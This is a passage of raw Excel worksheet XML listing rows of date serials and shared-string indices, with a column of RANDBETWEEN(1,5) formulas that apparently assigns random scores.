        <f t="shared" ca="1" si="168"/>
        <v>3</v>
      </c>
    </row>
    <row r="10770" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A10770" s="1">
        <v>43329.196608796294</v>
      </c>
      <c r="C10770" t="s">
        <v>6431</v>
      </c>
      <c r="D10770" t="s">
        <v>14</v>
      </c>
      <c r="E10770" s="2" t="s">
        <v>9640</v>
      </c>
      <c r="F10770">
        <f t="shared" ca="1" si="168"/>
        <v>4</v>
      </c>
    </row>
    <row r="10771" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A10771" s="1">
        <v>43329.182685185187</v>
      </c>
      <c r="C10771" t="s">
        <v>1377</v>
      </c>
      <c r="D10771" t="s">
        <v>23</v>
      </c>
      <c r="E10771" s="2" t="s">
        <v>9641</v>
      </c>
      <c r="F10771">
        <f t="shared" ca="1" si="168"/>
        <v>3</v>
      </c>
    </row>
    <row r="10772" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10772" s="1">
        <v>43329.175868055558</v>
      </c>
      <c r="C10772" t="s">
        <v>139</v>
      </c>
      <c r="E10772" t="s">
        <v>9642</v>
      </c>
      <c r="F10772">
        <f t="shared" ca="1" si="168"/>
        <v>4</v>
      </c>
    </row>
    <row r="10773" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A10773" s="1">
        <v>43329.140555555554</v>
      </c>
      <c r="C10773" t="s">
        <v>1510</v>
      </c>
      <c r="D10773" t="s">
        <v>178</v>
      </c>
      <c r="E10773" s="2" t="s">
        <v>9643</v>
      </c>
      <c r="F10773">
        <f t="shared" ca="1" si="168"/>
        <v>3</v>
      </c>
    </row>
    <row r="10774" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10774" s="1">
        <v>43329.138240740744</v>
      </c>
      <c r="C10774" t="s">
        <v>139</v>
      </c>
      <c r="E10774" t="s">
        <v>9644</v>
      </c>
      <c r="F10774">
        <f t="shared" ca="1" si="168"/>
        <v>2</v>
      </c>
    </row>
    <row r="10775" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A10775" s="1">
        <v>43329.138124999998</v>
      </c>
      <c r="C10775" t="s">
        <v>10</v>
      </c>
      <c r="D10775" t="s">
        <v>374</v>
      </c>
      <c r="E10775" s="2" t="s">
        <v>9645</v>
      </c>
      <c r="F10775">
        <f t="shared" ca="1" si="168"/>
        <v>5</v>
      </c>
    </row>
    <row r="10776" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10776" s="1">
        <v>43329.124513888892</v>
      </c>
      <c r="C10776" t="s">
        <v>41</v>
      </c>
      <c r="E10776" t="s">
        <v>9646</v>
      </c>
      <c r="F10776">
        <f t="shared" ca="1" si="168"/>
        <v>5</v>
      </c>
    </row>
    <row r="10777" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A10777" s="1">
        <v>43329.119618055556</v>
      </c>
      <c r="C10777" t="s">
        <v>1068</v>
      </c>
      <c r="D10777" t="s">
        <v>163</v>
      </c>
      <c r="E10777" s="2" t="s">
        <v>9647</v>
      </c>
      <c r="F10777">
        <f t="shared" ca="1" si="168"/>
        <v>2</v>
      </c>
    </row>
    <row r="10778" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A10778" s="1">
        <v>43329.080717592595</v>
      </c>
      <c r="C10778" t="s">
        <v>3515</v>
      </c>
      <c r="D10778" t="s">
        <v>222</v>
      </c>
      <c r="E10778" s="2" t="s">
        <v>9648</v>
      </c>
      <c r="F10778">
        <f t="shared" ca="1" si="168"/>
        <v>1</v>
      </c>
    </row>
    <row r="10779" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10779" s="1">
        <v>43329.059004629627</v>
      </c>
      <c r="C10779" t="s">
        <v>3106</v>
      </c>
      <c r="D10779" t="s">
        <v>46</v>
      </c>
      <c r="E10779" t="s">
        <v>9588</v>
      </c>
      <c r="F10779">
        <f t="shared" ca="1" si="168"/>
        <v>1</v>
      </c>
    </row>
    <row r="10780" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10780" s="1">
        <v>43329.042962962965</v>
      </c>
      <c r="C10780" t="s">
        <v>3106</v>
      </c>
      <c r="D10780" t="s">
        <v>71</v>
      </c>
      <c r="E10780" t="s">
        <v>9588</v>
      </c>
      <c r="F10780">
        <f t="shared" ca="1" si="168"/>
        <v>2</v>
      </c>
    </row>
    <row r="10781" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A10781" s="1">
        <v>43329.009722222225</v>
      </c>
      <c r="C10781" t="s">
        <v>127</v>
      </c>
      <c r="D10781" t="s">
        <v>229</v>
      </c>
      <c r="E10781" s="2" t="s">
        <v>9649</v>
      </c>
      <c r="F10781">
        <f t="shared" ca="1" si="168"/>
        <v>1</v>
      </c>
    </row>
    <row r="10782" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A10782" s="1">
        <v>43328.998935185184</v>
      </c>
      <c r="C10782" t="s">
        <v>253</v>
      </c>
      <c r="E10782" s="2" t="s">
        <v>9650</v>
      </c>
      <c r="F10782">
        <f t="shared" ca="1" si="168"/>
        <v>5</v>
      </c>
    </row>
    <row r="10783" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10783" s="1">
        <v>43328.978981481479</v>
      </c>
      <c r="C10783" t="s">
        <v>10</v>
      </c>
      <c r="D10783" t="s">
        <v>94</v>
      </c>
      <c r="E10783" t="s">
        <v>9651</v>
      </c>
      <c r="F10783">
        <f t="shared" ca="1" si="168"/>
        <v>1</v>
      </c>
    </row>
    <row r="10784" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A10784" s="1">
        <v>43328.897280092591</v>
      </c>
      <c r="C10784" t="s">
        <v>107</v>
      </c>
      <c r="D10784" t="s">
        <v>885</v>
      </c>
      <c r="E10784" s="2" t="s">
        <v>9652</v>
      </c>
      <c r="F10784">
        <f t="shared" ca="1" si="168"/>
        <v>2</v>
      </c>
    </row>
    <row r="10785" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A10785" s="1">
        <v>43328.894155092596</v>
      </c>
      <c r="C10785" t="s">
        <v>1068</v>
      </c>
      <c r="D10785" t="s">
        <v>251</v>
      </c>
      <c r="E10785" s="2" t="s">
        <v>9653</v>
      </c>
      <c r="F10785">
        <f t="shared" ca="1" si="168"/>
        <v>1</v>
      </c>
    </row>
    <row r="10786" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10786" s="1">
        <v>43328.847638888888</v>
      </c>
      <c r="C10786" t="s">
        <v>140</v>
      </c>
      <c r="D10786" t="s">
        <v>141</v>
      </c>
      <c r="E10786" t="s">
        <v>9654</v>
      </c>
      <c r="F10786">
        <f t="shared" ca="1" si="168"/>
        <v>4</v>
      </c>
    </row>
    <row r="10787" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10787" s="1">
        <v>43328.841597222221</v>
      </c>
      <c r="C10787" t="s">
        <v>10</v>
      </c>
      <c r="D10787" t="s">
        <v>6</v>
      </c>
      <c r="E10787" t="s">
        <v>9655</v>
      </c>
      <c r="F10787">
        <f t="shared" ca="1" si="168"/>
        <v>4</v>
      </c>
    </row>
    <row r="10788" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A10788" s="1">
        <v>43328.815462962964</v>
      </c>
      <c r="C10788" t="s">
        <v>10</v>
      </c>
      <c r="D10788" t="s">
        <v>6</v>
      </c>
      <c r="E10788" s="2" t="s">
        <v>9656</v>
      </c>
      <c r="F10788">
        <f t="shared" ca="1" si="168"/>
        <v>4</v>
      </c>
    </row>
    <row r="10789" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A10789" s="1">
        <v>43328.815451388888</v>
      </c>
      <c r="C10789" t="s">
        <v>10</v>
      </c>
      <c r="D10789" t="s">
        <v>6</v>
      </c>
      <c r="E10789" s="2" t="s">
        <v>9656</v>
      </c>
      <c r="F10789">
        <f t="shared" ca="1" si="168"/>
        <v>1</v>
      </c>
    </row>
    <row r="10790" spans="1:6" ht="195" x14ac:dyDescent="0.25">
      <c r="A10790" s="1">
        <v>43328.807951388888</v>
      </c>
      <c r="C10790" t="s">
        <v>43</v>
      </c>
      <c r="D10790" t="s">
        <v>222</v>
      </c>
      <c r="E10790" s="2" t="s">
        <v>9657</v>
      </c>
      <c r="F10790">
        <f t="shared" ca="1" si="168"/>
        <v>5</v>
      </c>
    </row>
    <row r="10791" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10791" s="1">
        <v>43328.745717592596</v>
      </c>
      <c r="C10791" t="s">
        <v>6</v>
      </c>
      <c r="D10791" t="s">
        <v>25</v>
      </c>
      <c r="F10791">
        <f t="shared" ca="1" si="168"/>
        <v>5</v>
      </c>
    </row>
    <row r="10792" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10792" s="1">
        <v>43328.724745370368</v>
      </c>
      <c r="C10792" t="s">
        <v>10</v>
      </c>
      <c r="D10792" t="s">
        <v>107</v>
      </c>
      <c r="E10792" t="s">
        <v>9658</v>
      </c>
      <c r="F10792">
        <f t="shared" ca="1" si="168"/>
        <v>5</v>
      </c>
    </row>
    <row r="10793" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10793" s="1">
        <v>43328.700381944444</v>
      </c>
      <c r="C10793" t="s">
        <v>10</v>
      </c>
      <c r="D10793" t="s">
        <v>41</v>
      </c>
      <c r="E10793" t="s">
        <v>9659</v>
      </c>
      <c r="F10793">
        <f t="shared" ca="1" si="168"/>
        <v>2</v>
      </c>
    </row>
    <row r="10794" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A10794" s="1">
        <v>43328.696851851855</v>
      </c>
      <c r="C10794" t="s">
        <v>10</v>
      </c>
      <c r="D10794" t="s">
        <v>6</v>
      </c>
      <c r="E10794" s="2" t="s">
        <v>9660</v>
      </c>
      <c r="F10794">
        <f t="shared" ca="1" si="168"/>
        <v>5</v>
      </c>
    </row>
    <row r="10795" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10795" s="1">
        <v>43328.687962962962</v>
      </c>
      <c r="C10795" t="s">
        <v>10</v>
      </c>
      <c r="D10795" t="s">
        <v>33</v>
      </c>
      <c r="E10795" t="s">
        <v>9661</v>
      </c>
      <c r="F10795">
        <f t="shared" ca="1" si="168"/>
        <v>4</v>
      </c>
    </row>
    <row r="10796" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10796" s="1">
        <v>43328.668368055558</v>
      </c>
      <c r="C10796" t="s">
        <v>10</v>
      </c>
      <c r="D10796" t="s">
        <v>17</v>
      </c>
      <c r="E10796" t="s">
        <v>9662</v>
      </c>
      <c r="F10796">
        <f t="shared" ca="1" si="168"/>
        <v>5</v>
      </c>
    </row>
    <row r="10797" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10797" s="1">
        <v>43328.667719907404</v>
      </c>
      <c r="C10797" t="s">
        <v>10</v>
      </c>
      <c r="D10797" t="s">
        <v>89</v>
      </c>
      <c r="E10797" t="s">
        <v>9663</v>
      </c>
      <c r="F10797">
        <f t="shared" ca="1" si="168"/>
        <v>4</v>
      </c>
    </row>
    <row r="10798" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A10798" s="1">
        <v>43328.641435185185</v>
      </c>
      <c r="C10798" t="s">
        <v>6</v>
      </c>
      <c r="D10798" t="s">
        <v>25</v>
      </c>
      <c r="E10798" s="2" t="s">
        <v>9664</v>
      </c>
      <c r="F10798">
        <f t="shared" ca="1" si="168"/>
        <v>1</v>
      </c>
    </row>
    <row r="10799" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10799" s="1">
        <v>43328.630983796298</v>
      </c>
      <c r="C10799" t="s">
        <v>10</v>
      </c>
      <c r="D10799" t="s">
        <v>92</v>
      </c>
      <c r="E10799" t="s">
        <v>9665</v>
      </c>
      <c r="F10799">
        <f t="shared" ca="1" si="168"/>
        <v>3</v>
      </c>
    </row>
    <row r="10800" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10800" s="1">
        <v>43328.61824074074</v>
      </c>
      <c r="C10800" t="s">
        <v>4060</v>
      </c>
      <c r="D10800" t="s">
        <v>89</v>
      </c>
      <c r="E10800" t="s">
        <v>8504</v>
      </c>
      <c r="F10800">
        <f t="shared" ca="1" si="168"/>
        <v>1</v>
      </c>
    </row>
    <row r="10801" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10801" s="1">
        <v>43328.604259259257</v>
      </c>
      <c r="C10801" t="s">
        <v>10</v>
      </c>
      <c r="D10801" t="s">
        <v>46</v>
      </c>
      <c r="E10801" t="s">
        <v>9666</v>
      </c>
      <c r="F10801">
        <f t="shared" ca="1" si="168"/>
        <v>2</v>
      </c>
    </row>
    <row r="10802" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10802" s="1">
        <v>43328.602962962963</v>
      </c>
      <c r="C10802" t="s">
        <v>6</v>
      </c>
      <c r="D10802" t="s">
        <v>194</v>
      </c>
      <c r="E10802" t="s">
        <v>9667</v>
      </c>
      <c r="F10802">
        <f t="shared" ca="1" si="168"/>
        <v>1</v>
      </c>
    </row>
    <row r="10803" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10803" s="1">
        <v>43328.56318287037</v>
      </c>
      <c r="C10803" t="s">
        <v>10</v>
      </c>
      <c r="D10803" t="s">
        <v>17</v>
      </c>
      <c r="E10803" t="s">
        <v>9668</v>
      </c>
      <c r="F10803">
        <f t="shared" ca="1" si="168"/>
        <v>5</v>
      </c>
    </row>
    <row r="10804" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A10804" s="1">
        <v>43328.562708333331</v>
      </c>
      <c r="C10804" t="s">
        <v>454</v>
      </c>
      <c r="D10804" t="s">
        <v>750</v>
      </c>
      <c r="E10804" s="2" t="s">
        <v>9669</v>
      </c>
      <c r="F10804">
        <f t="shared" ca="1" si="168"/>
        <v>4</v>
      </c>
    </row>
    <row r="10805" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10805" s="1">
        <v>43328.507835648146</v>
      </c>
      <c r="C10805" t="s">
        <v>6</v>
      </c>
      <c r="D10805" t="s">
        <v>2139</v>
      </c>
      <c r="E10805" t="s">
        <v>9670</v>
      </c>
      <c r="F10805">
        <f t="shared" ca="1" si="168"/>
        <v>4</v>
      </c>
    </row>
    <row r="10806" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10806" s="1">
        <v>43328.505601851852</v>
      </c>
      <c r="C10806" t="s">
        <v>260</v>
      </c>
      <c r="E10806" t="s">
        <v>9671</v>
      </c>
      <c r="F10806">
        <f t="shared" ca="1" si="168"/>
        <v>5</v>
      </c>
    </row>
    <row r="10807" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A10807" s="1">
        <v>43328.500856481478</v>
      </c>
      <c r="C10807" t="s">
        <v>463</v>
      </c>
      <c r="D10807" t="s">
        <v>23</v>
      </c>
      <c r="E10807" s="2" t="s">
        <v>9672</v>
      </c>
      <c r="F10807">
        <f t="shared" ca="1" si="168"/>
        <v>3</v>
      </c>
    </row>
    <row r="10808" spans="1:6" ht="210" x14ac:dyDescent="0.25">
      <c r="A10808" s="1">
        <v>43328.499560185184</v>
      </c>
      <c r="C10808" t="s">
        <v>156</v>
      </c>
      <c r="D10808" t="s">
        <v>885</v>
      </c>
      <c r="E10808" s="2" t="s">
        <v>9673</v>
      </c>
      <c r="F10808">
        <f t="shared" ca="1" si="168"/>
        <v>2</v>
      </c>
    </row>
    <row r="10809" spans="1:6" ht="345" x14ac:dyDescent="0.25">
      <c r="A10809" s="1">
        <v>43328.499502314815</v>
      </c>
      <c r="C10809" t="s">
        <v>10</v>
      </c>
      <c r="D10809" t="s">
        <v>33</v>
      </c>
      <c r="E10809" s="2" t="s">
        <v>9674</v>
      </c>
      <c r="F10809">
        <f t="shared" ca="1" si="168"/>
        <v>2</v>
      </c>
    </row>
    <row r="10810" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10810" s="1">
        <v>43328.497442129628</v>
      </c>
      <c r="C10810" t="s">
        <v>318</v>
      </c>
      <c r="F10810">
        <f t="shared" ca="1" si="168"/>
        <v>5</v>
      </c>
    </row>
    <row r="10811" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10811" s="1">
        <v>43328.474050925928</v>
      </c>
      <c r="C10811" t="s">
        <v>10</v>
      </c>
      <c r="D10811" t="s">
        <v>20</v>
      </c>
      <c r="E10811" t="s">
        <v>9675</v>
      </c>
      <c r="F10811">
        <f t="shared" ca="1" si="168"/>
        <v>3</v>
      </c>
    </row>
    <row r="10812" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10812" s="1">
        <v>43328.463402777779</v>
      </c>
      <c r="C10812" t="s">
        <v>10</v>
      </c>
      <c r="D10812" t="s">
        <v>89</v>
      </c>
      <c r="E10812" t="s">
        <v>9676</v>
      </c>
      <c r="F10812">
        <f t="shared" ca="1" si="168"/>
        <v>4</v>
      </c>
    </row>
    <row r="10813" spans="1:6" ht="345" x14ac:dyDescent="0.25">
      <c r="A10813" s="1">
        <v>43328.426828703705</v>
      </c>
      <c r="C10813" t="s">
        <v>10</v>
      </c>
      <c r="D10813" t="s">
        <v>33</v>
      </c>
      <c r="E10813" s="2" t="s">
        <v>9674</v>
      </c>
      <c r="F10813">
        <f t="shared" ca="1" si="168"/>
        <v>3</v>
      </c>
    </row>
    <row r="10814" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10814" s="1">
        <v>43328.405914351853</v>
      </c>
      <c r="C10814" t="s">
        <v>318</v>
      </c>
      <c r="E10814" t="s">
        <v>9677</v>
      </c>
      <c r="F10814">
        <f t="shared" ca="1" si="168"/>
        <v>4</v>
      </c>
    </row>
    <row r="10815" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A10815" s="1">
        <v>43328.401655092595</v>
      </c>
      <c r="C10815" t="s">
        <v>3106</v>
      </c>
      <c r="D10815" t="s">
        <v>1056</v>
      </c>
      <c r="E10815" s="2" t="s">
        <v>9678</v>
      </c>
      <c r="F10815">
        <f t="shared" ca="1" si="168"/>
        <v>2</v>
      </c>
    </row>
    <row r="10816" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10816" s="1">
        <v>43328.397627314815</v>
      </c>
      <c r="C10816" t="s">
        <v>10</v>
      </c>
      <c r="D10816" t="s">
        <v>52</v>
      </c>
      <c r="E10816" t="s">
        <v>9679</v>
      </c>
      <c r="F10816">
        <f t="shared" ca="1" si="168"/>
        <v>5</v>
      </c>
    </row>
    <row r="10817" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10817" s="1">
        <v>43328.385983796295</v>
      </c>
      <c r="C10817" t="s">
        <v>41</v>
      </c>
      <c r="E10817" t="s">
        <v>9680</v>
      </c>
      <c r="F10817">
        <f t="shared" ca="1" si="168"/>
        <v>5</v>
      </c>
    </row>
    <row r="10818" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10818" s="1">
        <v>43328.378437500003</v>
      </c>
      <c r="C10818" t="s">
        <v>10</v>
      </c>
      <c r="D10818" t="s">
        <v>163</v>
      </c>
      <c r="E10818" t="s">
        <v>9681</v>
      </c>
      <c r="F10818">
        <f t="shared" ref="F10818:F10881" ca="1" si="169">RANDBETWEEN(1,5)</f>
        <v>2</v>
      </c>
    </row>
    <row r="10819" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A10819" s="1">
        <v>43328.376967592594</v>
      </c>
      <c r="C10819" t="s">
        <v>17</v>
      </c>
      <c r="D10819" t="s">
        <v>1036</v>
      </c>
      <c r="E10819" s="2" t="s">
        <v>9682</v>
      </c>
      <c r="F10819">
        <f t="shared" ca="1" si="169"/>
        <v>3</v>
      </c>
    </row>
    <row r="10820" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10820" s="1">
        <v>43328.370659722219</v>
      </c>
      <c r="C10820" t="s">
        <v>260</v>
      </c>
      <c r="E10820" t="s">
        <v>9683</v>
      </c>
      <c r="F10820">
        <f t="shared" ca="1" si="169"/>
        <v>5</v>
      </c>
    </row>
    <row r="10821" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10821" s="1">
        <v>43328.365023148152</v>
      </c>
      <c r="C10821" t="s">
        <v>1510</v>
      </c>
      <c r="D10821" t="s">
        <v>114</v>
      </c>
      <c r="E10821" t="s">
        <v>9684</v>
      </c>
      <c r="F10821">
        <f t="shared" ca="1" si="169"/>
        <v>2</v>
      </c>
    </row>
    <row r="10822" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10822" s="1">
        <v>43328.363819444443</v>
      </c>
      <c r="C10822" t="s">
        <v>776</v>
      </c>
      <c r="E10822" t="s">
        <v>9685</v>
      </c>
      <c r="F10822">
        <f t="shared" ca="1" si="169"/>
        <v>3</v>
      </c>
    </row>
    <row r="10823" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A10823" s="1">
        <v>43328.360810185186</v>
      </c>
      <c r="C10823" t="s">
        <v>8808</v>
      </c>
      <c r="D10823" t="s">
        <v>92</v>
      </c>
      <c r="E10823" s="2" t="s">
        <v>9686</v>
      </c>
      <c r="F10823">
        <f t="shared" ca="1" si="169"/>
        <v>2</v>
      </c>
    </row>
    <row r="10824" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A10824" s="1">
        <v>43328.330358796295</v>
      </c>
      <c r="C10824" t="s">
        <v>430</v>
      </c>
      <c r="D10824" t="s">
        <v>312</v>
      </c>
      <c r="E10824" s="2" t="s">
        <v>9687</v>
      </c>
      <c r="F10824">
        <f t="shared" ca="1" si="169"/>
        <v>3</v>
      </c>
    </row>
    <row r="10825" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A10825" s="1">
        <v>43328.330069444448</v>
      </c>
      <c r="C10825" t="s">
        <v>463</v>
      </c>
      <c r="D10825" t="s">
        <v>41</v>
      </c>
      <c r="E10825" s="2" t="s">
        <v>9672</v>
      </c>
      <c r="F10825">
        <f t="shared" ca="1" si="169"/>
        <v>4</v>
      </c>
    </row>
    <row r="10826" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A10826" s="1">
        <v>43328.291331018518</v>
      </c>
      <c r="C10826" t="s">
        <v>140</v>
      </c>
      <c r="D10826" t="s">
        <v>234</v>
      </c>
      <c r="E10826" s="2" t="s">
        <v>9688</v>
      </c>
      <c r="F10826">
        <f t="shared" ca="1" si="169"/>
        <v>2</v>
      </c>
    </row>
    <row r="10827" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10827" s="1">
        <v>43328.269699074073</v>
      </c>
      <c r="C10827" t="s">
        <v>65</v>
      </c>
      <c r="E10827" t="s">
        <v>9689</v>
      </c>
      <c r="F10827">
        <f t="shared" ca="1" si="169"/>
        <v>4</v>
      </c>
    </row>
    <row r="10828" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A10828" s="1">
        <v>43328.260370370372</v>
      </c>
      <c r="C10828" t="s">
        <v>1501</v>
      </c>
      <c r="D10828" t="s">
        <v>750</v>
      </c>
      <c r="E10828" s="2" t="s">
        <v>9690</v>
      </c>
      <c r="F10828">
        <f t="shared" ca="1" si="169"/>
        <v>3</v>
      </c>
    </row>
    <row r="10829" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A10829" s="1">
        <v>43328.258217592593</v>
      </c>
      <c r="C10829" t="s">
        <v>17</v>
      </c>
      <c r="D10829" t="s">
        <v>330</v>
      </c>
      <c r="E10829" s="2" t="s">
        <v>9682</v>
      </c>
      <c r="F10829">
        <f t="shared" ca="1" si="169"/>
        <v>5</v>
      </c>
    </row>
    <row r="10830" spans="1:6" ht="345" x14ac:dyDescent="0.25">
      <c r="A10830" s="1">
        <v>43328.247604166667</v>
      </c>
      <c r="C10830" t="s">
        <v>10</v>
      </c>
      <c r="D10830" t="s">
        <v>36</v>
      </c>
      <c r="E10830" s="2" t="s">
        <v>9691</v>
      </c>
      <c r="F10830">
        <f t="shared" ca="1" si="169"/>
        <v>2</v>
      </c>
    </row>
    <row r="10831" spans="1:6" ht="225" x14ac:dyDescent="0.25">
      <c r="A10831" s="1">
        <v>43328.235937500001</v>
      </c>
      <c r="C10831" t="s">
        <v>10</v>
      </c>
      <c r="D10831" t="s">
        <v>163</v>
      </c>
      <c r="E10831" s="2" t="s">
        <v>9692</v>
      </c>
      <c r="F10831">
        <f t="shared" ca="1" si="169"/>
        <v>5</v>
      </c>
    </row>
    <row r="10832" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10832" s="1">
        <v>43328.219652777778</v>
      </c>
      <c r="C10832" t="s">
        <v>139</v>
      </c>
      <c r="F10832">
        <f t="shared" ca="1" si="169"/>
        <v>3</v>
      </c>
    </row>
    <row r="10833" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A10833" s="1">
        <v>43328.211458333331</v>
      </c>
      <c r="C10833" t="s">
        <v>10</v>
      </c>
      <c r="D10833" t="s">
        <v>6</v>
      </c>
      <c r="E10833" s="2" t="s">
        <v>9693</v>
      </c>
      <c r="F10833">
        <f t="shared" ca="1" si="169"/>
        <v>2</v>
      </c>
    </row>
    <row r="10834" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A10834" s="1">
        <v>43328.2033912037</v>
      </c>
      <c r="C10834" t="s">
        <v>463</v>
      </c>
      <c r="D10834" t="s">
        <v>163</v>
      </c>
      <c r="E10834" s="2" t="s">
        <v>9672</v>
      </c>
      <c r="F10834">
        <f t="shared" ca="1" si="169"/>
        <v>1</v>
      </c>
    </row>
    <row r="10835" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A10835" s="1">
        <v>43328.200219907405</v>
      </c>
      <c r="C10835" t="s">
        <v>5634</v>
      </c>
      <c r="D10835" t="s">
        <v>2214</v>
      </c>
      <c r="E10835" s="2" t="s">
        <v>9694</v>
      </c>
      <c r="F10835">
        <f t="shared" ca="1" si="169"/>
        <v>4</v>
      </c>
    </row>
    <row r="10836" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A10836" s="1">
        <v>43328.184386574074</v>
      </c>
      <c r="C10836" t="s">
        <v>67</v>
      </c>
      <c r="E10836" s="2" t="s">
        <v>9695</v>
      </c>
      <c r="F10836">
        <f t="shared" ca="1" si="169"/>
        <v>2</v>
      </c>
    </row>
    <row r="10837" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10837" s="1">
        <v>43328.175694444442</v>
      </c>
      <c r="C10837" t="s">
        <v>140</v>
      </c>
      <c r="D10837" t="s">
        <v>46</v>
      </c>
      <c r="E10837" t="s">
        <v>9696</v>
      </c>
      <c r="F10837">
        <f t="shared" ca="1" si="169"/>
        <v>1</v>
      </c>
    </row>
    <row r="10838" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A10838" s="1">
        <v>43328.162187499998</v>
      </c>
      <c r="C10838" t="s">
        <v>559</v>
      </c>
      <c r="E10838" s="2" t="s">
        <v>9697</v>
      </c>
      <c r="F10838">
        <f t="shared" ca="1" si="169"/>
        <v>4</v>
      </c>
    </row>
    <row r="10839" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A10839" s="1">
        <v>43328.158877314818</v>
      </c>
      <c r="C10839" t="s">
        <v>17</v>
      </c>
      <c r="D10839" t="s">
        <v>229</v>
      </c>
      <c r="E10839" s="2" t="s">
        <v>9682</v>
      </c>
      <c r="F10839">
        <f t="shared" ca="1" si="169"/>
        <v>3</v>
      </c>
    </row>
    <row r="10840" spans="1:6" ht="210" x14ac:dyDescent="0.25">
      <c r="A10840" s="1">
        <v>43328.155613425923</v>
      </c>
      <c r="C10840" t="s">
        <v>10</v>
      </c>
      <c r="D10840" t="s">
        <v>367</v>
      </c>
      <c r="E10840" s="2" t="s">
        <v>9698</v>
      </c>
      <c r="F10840">
        <f t="shared" ca="1" si="169"/>
        <v>2</v>
      </c>
    </row>
    <row r="10841" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10841" s="1">
        <v>43328.138877314814</v>
      </c>
      <c r="C10841" t="s">
        <v>139</v>
      </c>
      <c r="E10841" t="s">
        <v>9699</v>
      </c>
      <c r="F10841">
        <f t="shared" ca="1" si="169"/>
        <v>5</v>
      </c>
    </row>
    <row r="10842" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A10842" s="1">
        <v>43328.13517361111</v>
      </c>
      <c r="C10842" t="s">
        <v>461</v>
      </c>
      <c r="E10842" s="2" t="s">
        <v>9700</v>
      </c>
      <c r="F10842">
        <f t="shared" ca="1" si="169"/>
        <v>4</v>
      </c>
    </row>
    <row r="10843" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A10843" s="1">
        <v>43328.106064814812</v>
      </c>
      <c r="C10843" t="s">
        <v>17</v>
      </c>
      <c r="E10843" s="2" t="s">
        <v>9701</v>
      </c>
      <c r="F10843">
        <f t="shared" ca="1" si="169"/>
        <v>4</v>
      </c>
    </row>
    <row r="10844" spans="1:6" ht="240" x14ac:dyDescent="0.25">
      <c r="A10844" s="1">
        <v>43328.102199074077</v>
      </c>
      <c r="C10844" t="s">
        <v>71</v>
      </c>
      <c r="E10844" s="2" t="s">
        <v>9702</v>
      </c>
      <c r="F10844">
        <f t="shared" ca="1" si="169"/>
        <v>3</v>
      </c>
    </row>
    <row r="10845" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10845" s="1">
        <v>43328.077222222222</v>
      </c>
      <c r="C10845" t="s">
        <v>97</v>
      </c>
      <c r="E10845" t="s">
        <v>9703</v>
      </c>
      <c r="F10845">
        <f t="shared" ca="1" si="169"/>
        <v>1</v>
      </c>
    </row>
    <row r="10846" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10846" s="1">
